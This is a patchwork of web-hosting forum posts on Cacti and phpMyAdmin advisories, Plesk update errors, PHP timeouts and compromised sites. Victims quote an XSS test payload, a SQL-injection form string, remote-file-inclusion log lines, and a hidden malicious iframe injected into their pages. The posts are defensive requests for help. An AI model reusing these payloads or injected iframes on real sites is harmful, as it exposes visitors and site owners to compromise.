Cacti Command Execution And SQL Injection Vulnerabilities
Jan 14, 2007Cacti version 0.8.6i has vulnerability: [url]
Solution: [url]
Cacti version 0.8.6i has vulnerability: [url]
Solution: [url]
while plesk was trying to update automatically (as per the normal preference settings) but suddenly gave this error
Execution failed.
Command: autoinstaller
Arguments: Array
(
[0] => --select-product-id
[1] => plesk
[2] => --select-release-current
[3] => --upgrade-installed-components
)
Details: Doing restart of Parallels Installer...
File downloading products.inf3: 100% was finished.
File downloading plesk.inf3: 10%..20%..30%..40%..50%..60%..70%..80%..90%..100% was finished.
File downloading ppsmbe.inf3: 17%..26%..37%..47%..57%..78%..88%..100% was finished.
File downloading sitebuilder.inf3: 22%..35%..48%..60%..73%..86%..100% was finished.
[code]....
ERROR: Currently installed version of product with ID 'plesk' is not available from download site anymore.Please upgrade to the next available product version to receive software updates.Seems like the RPM got damaged, but I already fixed that part, now when I put "install" I'm geting the following
Installation started in background..Getting bootstrapper packages to installation list:
Following bootstrapper packages will be installed: (empty)
----------------
Getting packages to installation list:
Following packages will be installed: (empty)
----------------
Loaded plugins: fastestmirror
Patch for plesk 12.0.18 will not be installed since it is already applied.Error: You already have the latest version of product(s) and all selected components installed. Installation will not continue.HOWEVER the "mail" and mail server configuration no longer shows in "tools & settings".
Acunetix says my site has 28 XSS vulnerabilities?
For example it says calendar.pl is vulnerable and it was able to set a javascript alert as the variable calendar_view.
How can I fix this?
Vulnerability description
This script is possibly vulnerable to Cross Site Scripting (XSS) attacks.
Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. A browser execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.
This vulnerability affects /cgi-bin/calendar.pl.
The impact of this vulnerability
Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application
Attack details
The POST variable calendar_view has been set to >"><ScRiPt%20%0a%0d>alert(398096611151)%3B</ScRiPt>.
[url]
Upgrade if this affects you.
Historically we use Cacti internally for bandwidth tracking/snmp enabled hosts. However we are re-doing our management from scratch so is there any other software that is worth looking at that you would consider better than Cacti (PHP/MySQL/Linux ideally)
View 13 Replies View RelatedAnyone know of a monitoring package that is essentially Nagios and Cacti in one? Nice SNMP capabilities, but still basic service checks (smtp, dns, web with host, etc), and some nice reporting?
Most reporting packages I've looked at seem so overly complicated with confusing/cluttered UIs and lack plain simplicity.
All I want is to monitor these servers, use SNMP for RAID status, disk space, CPU, etc, and verify connectivity to its services and each website. Is it asking too much? I've been using Cacti and Nagios, but separately and I'd really like something that combines the two of them.
My other box gear by DedicatedPlace and they guys still have issue to install CACTI on this box under CentOS with cPanel:
Just to give you an update. We have installed cacti, using this procedure [url]
and others in the net. There are libraries and programs needed and we installed it all, and only the last step, running it, is having problem, we are having an apache forbidden error and we are still looking what is the problem..
hosting by script cacti
Is there a hosting company supports the installation of the = cacti=
Supported by the company cacti.net
It is possible to monitor bandwidth per IP instead of per port using Cacti?
I have been told no, but if no, how can you possibly monitor bandwidth per VPS on a host server?
Just got this email
Quote:
Dear Customers,
Multiple security vulnerabilities were discovered in hyperVM and Lxadmin/Kloxo. It is recommended that you update your hyperVM/Kloxo systems to the latest version, as soon as possible.
Details of the vulnerabilities will be posted in the coming days in our forum.
On hyperVM or Kloxo master, Run:
/script/upcp
Lxlabs Support Team
How I can secure my server from vulnerabilities and threats and ddos attack? How can I find my server is compromised or hacked?
Which ports I should check, what commands I should fired on shell prompt? which softwares you will recommend.
I had a non client send me an email about being hacked. apparently the hacker is using a program/command line and is entering this into the db:
user=' &pass1=111-222-1933email@adress.tst&pass2=test&submit=
create%20Account
any way he can patch up his navicat database to stop this?
I've experienced so much hacker attack lately. Hosted wiht hostforweb.com if that makes any difference.
Last issue I have is:
Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities
How I can secure my server against such attacks?
Also I need to resolve this issue ASAP but can not find the file and I don't know what to do.
Report:
Sample log report including date and time stamp:
Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:03
-0500] GET
/awstats/data/awstats1...marythecelticlady.com.txt/admin/index.php?o=[url]HTTP/1.1 302 228 - libwww-perl/5.808 - -
Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET /admin/index.php?o=[url]HTTP/1.1
302 228 - libwww-perl/5.808 - -
Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET
/awstats/data/admin/index.php?o=[url]
HTTP/1.1 302 228 - libwww-perl/5.808 - -
WHAT NEEDS TO BE DONE HERE and where to located it? Your help is greatly appreciated.
Yesterday it was discovered that a website had most or all of the html pages compromised with some sort of iframe injection. Every page had an iframe line added to the bottom that attempted to load something from another website. It was coming from a domain called reycross.net and was attempting to load the html/framer virus into the visitor's computer.
The problem is that I cannot identify how the injection hit the system. Here are the facts I can provide...
1. The server does NOT have Joomla or Wordpress.
2. The injection seemed to hit every html page whether the page was active on the site or not.
3. The injection hit only one account.
I have checked /var/log/messages and /var/log/secure and find nothing.
What I don't have is proper ftp logging to determine whether the injection came from that method.
Additional notes: Shortly before the injection took place the box was updated to the latest version of cpanel. Also php was upgraded to 5.2.10. At the time suPHP was enabled but unfortunately had to be disabled because it created problems with another site. Prior to this suPHP was disabled as well.
I went through and removed all instances of this iframe injection and ran another update of cpanel. I also recompiled apache/php and went back to 5.2.8 in case the problem was php related.
Anyone using phpMyAdmin for MySQL admin, you need to know about a newly discovered attack vector.
Here's the official announcement: [url]
The key to this is in their description, "A logged-in user can be subject of SQL injection through cross site request forgery. Several scripts in phpMyAdmin are vulnerable and the attack can be made through table parameter."
A logged in user... This attack is a combination of SQL injection through CSRF. In other words, you'd have to be logged into your phpMyAdmin program, hit a website setup for CSRF, and then the attacker could have access to your phpMyAdmin as you.
If there's interest here, I could write up a detailed description of CSRF and how to prevent this type of attack.
Just let me know...
You should upgrade immediately to either phpMyAdmin 2.9.11.4 or 3.1.1.0 or apply patch 12100.
One of my site index page is having iframe injections. I am not sure about the reason. page is chmod to 644 under php.ini dl() is even disabled.
But still person is some how able to inject iframe that redirects the page to some other url.
Any suggestions how to fix that ? any mod_rewrite rule or anything for this?
problem on some big DB driven sites in PHP.
Lets say I have a file, doesnt even need to have any PHP functions in the document, could be just pure CSS / images. Say I have a copy of this file named something.html and a copy named something.php, the php one takes about 5 times longer to load than the html page. You can see 90% of the page loads and then it sticks with the loading bar nearly fininshed, waits a while and then pings to finished and the remaining parts of the site load (usually footer links etc).
This has me stumped, even has my hosts stumped. Would any one have any idea why this may happen? Something to do with the installation directory of PHP or location of php.ini?
This is on a Windows 2003 machine running IIS6, I have tested the same files on a Linux installation and its perfectly fine.
I am trying to run a php script on our server to split a very large file. As a result of the file size the script is timing out with this error:
Fatal error: Maximum execution time of 30 seconds exceeded in [url]on line 155
How can I extend the server execution time to the script can complete? I have cpanel with WHM installed.
i always get :-
Fatal error: Maximum execution time of 30 seconds exceeded in /home/ante/public_html/me/classes/http.php on line 418
Warning: fclose(): supplied argument is not a valid stream resource in /home/ante/public_html/me/classes/other.php on line 145
when i try upload big files (up 140mb to my vps using RapidLeech
and here my php.ini
[url]
i chnaged the php.ini to the new value and restart http only
my vps info
safe mod : on
Operating system: Linux
PHP version: 5.2.5
Apache version: 1.3.41 (Unix)
Does deploying a reverse proxy in front of the web/db server reduce the threat of SQL injection?
Emphasis on 'reduce' the threat - or does it provide no help at all?
I had done a program in early 2006 for a site in php-mysql. At the time of doing the code, The code written was not so standard and it contained uninitialized variables used for include file paths (eventhough values are assigned to it before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.
And now i was informed that the insecure code in my program caused the server crash and i have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside the /www/ will make the sites hosted on the server where this program runs to stop/crash for ever ?
------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;
mysql_query($query);
......
-------------------------------------------------------------------
i am seeing a lot of Local file inclusion (LFI) and mysql injection attacks quite often directed to php scripts.
what is the way to prevent them? would installing mod_security to apache work?
During the last couple of weeks my main server has started acting weird.
Sometimes(often) when accessing my site, I get a page saying that server or location could not be found. Reload and "bam" page loads again. Average load on the server is 0.50
When executing scripts (I.E uploading files using web2ftp or cp file manager) server shuts the connection after a few seconds and say page cannot be found.
I set the execution time in php to 60sec, so this is not the issue.
When I ping the server, I do not get any packet losses.
Before this thread happens, don't tell me to chmod the file to have execution privs. I want umask to work properly, with no seperarate chmod required.
For some reason, on every single system i've tested this on, linux, freebsd, vps, standalone server, fresh install of operating system, any time I test this, it ends up with the same issue.
Running `umask 000` should result in files created from that point on having a chmod of rwxrwxrwx. However, they always end up having a chmod of rw-rw-rw.
If I create a directory after setting the same umask setting, the directory ends up with rwxrwxrwx.
Code:
root@bonkers[/usr/local/etc/php/umask] $ umask 000
root@bonkers[/usr/local/etc/php/umask] $ touch 000
root@bonkers[/usr/local/etc/php/umask] $ mkdir d0
root@bonkers[/usr/local/etc/php/umask] $ ls -la
total 10
drwxrwxrwx 5 root wheel 512 Dec 6 03:31 .
drwxr-xr-x 4 root wheel 512 Dec 6 03:21 ..
-rw-rw-rw- 1 root wheel 0 Dec 6 03:31 000
drwxrwxrwx 2 root wheel 512 Dec 6 03:21 d0
Does CISCO ASA Firewall block SQL and XSS Injection? If not, then which are the firewalls available which do this job. I have checked web application firewalls and found them to be too costly for my budget. What are the other cheap options available?
View 3 Replies View RelatedI see on one server with windows 2k3 and sql 2000 alot of Injection attemts(lucky so far) and 90% come from china.
Is there any way on iis6 to put range ban like 123.52.0.0 - 123.55.255.255 so to ban all that network?
I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.
Code:
<iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
what is the reason and how to fix that ?
and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem :
rkhunter results:
Code:
Checking system commands...
Performing 'strings' command checks
Checking 'strings' command [ OK ]
Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preload file [ Not found ]
Checking LD_LIBRARY_PATH variable [ Not found ]
Performing file properties checks
Checking for prerequisites [ Warning ]
/bin/awk [ OK ]
/bin/basename [ OK ]
/bin/bash [ OK ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/cp [ OK ]
/bin/csh [ OK ]
/bin/cut [ OK ]
/bin/date [ OK ]
/bin/df [ OK ]
/bin/dmesg [ OK ]
/bin/echo [ OK ]
/bin/ed [ OK ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/mail [ OK ]
/bin/mktemp [ OK ]
/bin/more [ OK ]
/bin/mount [ OK ]
/bin/mv [ OK ]
/bin/netstat [ OK ]
/bin/passwd [ OK ]
/bin/ps [ OK ]
/bin/pwd [ OK ]
/bin/rpm [ OK ]
/bin/sed [ OK ]
/bin/sh [ OK ]
/bin/sort [ OK ]
/bin/su [ OK ]
/bin/touch [ OK ]
/bin/uname [ OK ]
/bin/gawk [ OK ]
/bin/tcsh [ OK ]
/usr/bin/awk [ OK ]
/usr/bin/chattr [ OK ]
/usr/bin/curl [ OK ]
/usr/bin/cut [ OK ]
/usr/bin/diff [ OK ]
/usr/bin/dirname [ OK ]
/usr/bin/du [ OK ]
/usr/bin/env [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/GET [ Warning ]
/usr/bin/groups [ Warning ]
/usr/bin/head [ OK ]
/usr/bin/id [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/last [ OK ]
/usr/bin/lastlog [ OK ]
/usr/bin/ldd [ Warning ]
/usr/bin/less [ OK ]
/usr/bin/locate [ OK ]
/usr/bin/logger [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/lynx [ OK ]
/usr/bin/md5sum [ OK ]
/usr/bin/newgrp [ OK ]
/usr/bin/passwd [ OK ]
/usr/bin/perl [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/readlink [ OK ]
/usr/bin/runcon [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/size [ OK ]
/usr/bin/slocate [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/strace [ OK ]
/usr/bin/strings [ OK ]
/usr/bin/sudo [ OK ]
/usr/bin/tail [ OK ]
/usr/bin/test [ OK ]
/usr/bin/top [ OK ]
/usr/bin/tr [ OK ]
/usr/bin/uniq [ OK ]
/usr/bin/users [ OK ]
/usr/bin/vmstat [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/wc [ OK ]
/usr/bin/wget [ OK ]
/usr/bin/whatis [ Warning ]
/usr/bin/whereis [ OK ]
/usr/bin/which [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
/usr/bin/gawk [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/lsmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/modprobe [ OK ]
/sbin/nologin [ OK ]
/sbin/rmmod [ OK ]
/sbin/runlevel [ OK ]
/sbin/sulogin [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/sbin/adduser [ OK ]
/usr/sbin/chroot [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
/usr/sbin/groupmod [ OK ]
/usr/sbin/grpck [ OK ]
/usr/sbin/kudzu [ OK ]
/usr/sbin/lsof [ OK ]
/usr/sbin/prelink [ OK ]
/usr/sbin/pwck [ OK ]
/usr/sbin/tcpd [ OK ]
/usr/sbin/useradd [ OK ]
/usr/sbin/userdel [ OK ]
/usr/sbin/usermod [ OK ]
/usr/sbin/vipw [ OK ]
/usr/sbin/xinetd [ OK ]
/usr/local/bin/perl [ OK ]
/usr/local/bin/rkhunter [ OK ]
Checking for rootkits...
Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
BeastKit Rootkit [ Not found ]
beX2 Rootkit [ Not found ]
BOBKit Rootkit [ Not found ]
CiNIK Worm (Slapper.B variant) [ Not found ]
Danny-Boy's Abuse Kit [ Not found ]
Devil RootKit [ Not found ]
Dica-Kit Rootkit [ Not found ]
Dreams Rootkit [ Not found ]
Duarawkz Rootkit [ Not found ]
Enye LKM [ Not found ]
Flea Linux Rootkit [ Not found ]
FreeBSD Rootkit [ Not found ]
****`it Rootkit [ Not found ]
GasKit Rootkit [ Not found ]
Heroin LKM [ Not found ]
HjC Kit [ Not found ]
ignoKit Rootkit [ Not found ]
ImperalsS-FBRK Rootkit [ Not found ]
Irix Rootkit [ Not found ]
Kitko Rootkit [ Not found ]
Knark Rootkit [ Not found ]
Li0n Worm [ Not found ]
Lockit / LJK2 Rootkit [ Not found ]
Mood-NT Rootkit [ Not found ]
MRK Rootkit [ Not found ]
Ni0 Rootkit [ Not found ]
Ohhara Rootkit [ Not found ]
Optic Kit (Tux) Worm [ Not found ]
Oz Rootkit [ Not found ]
Phalanx Rootkit [ Not found ]
Phalanx Rootkit (strings) [ Not found ]
Portacelo Rootkit [ Not found ]
R3dstorm Toolkit [ Not found ]
RH-Sharpe's Rootkit [ Not found ]
RSHA's Rootkit [ Not found ]
Scalper Worm [ Not found ]
Sebek LKM [ Not found ]
Shutdown Rootkit [ Not found ]
SHV4 Rootkit [ Not found ]
SHV5 Rootkit [ Not found ]
Sin Rootkit [ Not found ]
Slapper Worm [ Not found ]
Sneakin Rootkit [ Not found ]
Suckit Rootkit [ Not found ]
SunOS Rootkit [ Not found ]
SunOS / NSDAP Rootkit [ Not found ]
Superkit Rootkit [ Not found ]
TBD (Telnet BackDoor) [ Not found ]
TeLeKiT Rootkit [ Not found ]
T0rn Rootkit [ Not found ]
Trojanit Kit [ Not found ]
Tuxtendo Rootkit [ Not found ]
URK Rootkit [ Not found ]
VcKit Rootkit [ Not found ]
Volc Rootkit [ Not found ]
X-Org SunOS Rootkit [ Not found ]
zaRwT.KiT Rootkit [ Not found ]
Performing additional rootkit checks
Suckit Rookit additional checks [ OK ]
Checking for possible rootkit files and directories [ None found ]
Checking for possible rootkit strings [ None found ]
Performing malware checks
Checking running processes for suspicious files [ None found ]
Checking for login backdoors [ None found ]
Checking for suspicious directories [ None found ]
Checking for sniffer log files [ None found ]
Performing trojan specific checks
Checking for enabled xinetd services [ None found ]
Checking for Apache backdoor [ Not found ]
Performing Linux specific checks
Checking kernel module commands [ OK ]
Checking kernel module names [ OK ]
Checking the network...
Performing check for backdoor ports
Checking for UDP port 2001 [ Not found ]
Checking for TCP port 2006 [ Not found ]
Checking for TCP port 2128 [ Not found ]
Checking for TCP port 14856 [ Not found ]
Checking for TCP port 47107 [ Not found ]
Checking for TCP port 60922 [ Not found ]
Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]
Checking the local host...
Performing system boot checks
Checking for local host name [ Found ]
Checking for local startup files [ Found ]
Checking local startup files for malware [ None found ]
Checking system startup files for malware [ None found ]
Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
Checking for passwordless accounts [ None found ]
Checking for passwd file changes [ None found ]
Checking for group file changes [ None found ]
Checking root account shell history files [ OK ]
Performing system configuration file checks
Checking for SSH configuration file [ Found ]
Checking if SSH root access is allowed [ Warning ]
Checking if SSH protocol v1 is allowed [ Warning ]
Checking for running syslog daemon [ Found ]
Checking for syslog configuration file [ Found ]
Checking if syslog remote logging is allowed [ Not allowed ]
Performing filesystem checks
Checking /dev for suspicious file types [ None found ]
Checking for hidden files and directories [ Warning ]
Checking application versions...
Checking version of Exim MTA [ OK ]
Checking version of GnuPG [ Warning ]
Checking version of Apache [ Skipped ]
Checking version of Bind DNS [ OK ]
Checking version of OpenSSL [ Warning ]
Checking version of PHP [ OK ]
Checking version of Procmail MTA [ OK ]
Checking version of OpenSSH [ OK ]
System checks summary
=====================
File properties checks...
Required commands check failed
Files checked: 129
Suspect files: 6
Rootkit checks...
Rootkits checked : 114
Possible rootkits: 0
Applications checks...
Applications checked: 8
Suspect applications: 2
The system checks took: 3 minutes and 12 seconds
All results have been written to the logfile (/var/log/rkhunter.log)
One or more warnings have been found while checking the system.
Please check the log file (/var/log/rkhunter.log)
At times as I'm developing, due to some coding error in PHP on my part, particularly calling a COM object, the apache server crashes. I'm delighted that it recovers, but in so doing it always tries to rerun the query that crashed it, which just causes another crash, and so on. Is there some way of getting round this, so that it recovers but the problematic code is not rerun?
XP SP3 (still!)
Apache/2.4.3 (Win32) mod_fcgid/2.3.7 PHP/5.4.9
Firefox (Aurora)
some body attacking on my server and changing my users profile name /password or any other information so How To Protect MySQL Database From My SQL Injection Attacks? i have dedicate server i provide free wap sites to people with wildcard dns system and i have ConfigServer Security & Firewall installed.
View 3 Replies View RelatedWe are facing this strange Problem from yesterday that
<script language=javascript src= [url]
is added on end of every html Pages.
I don,t know that how this Injection on every Html Pages.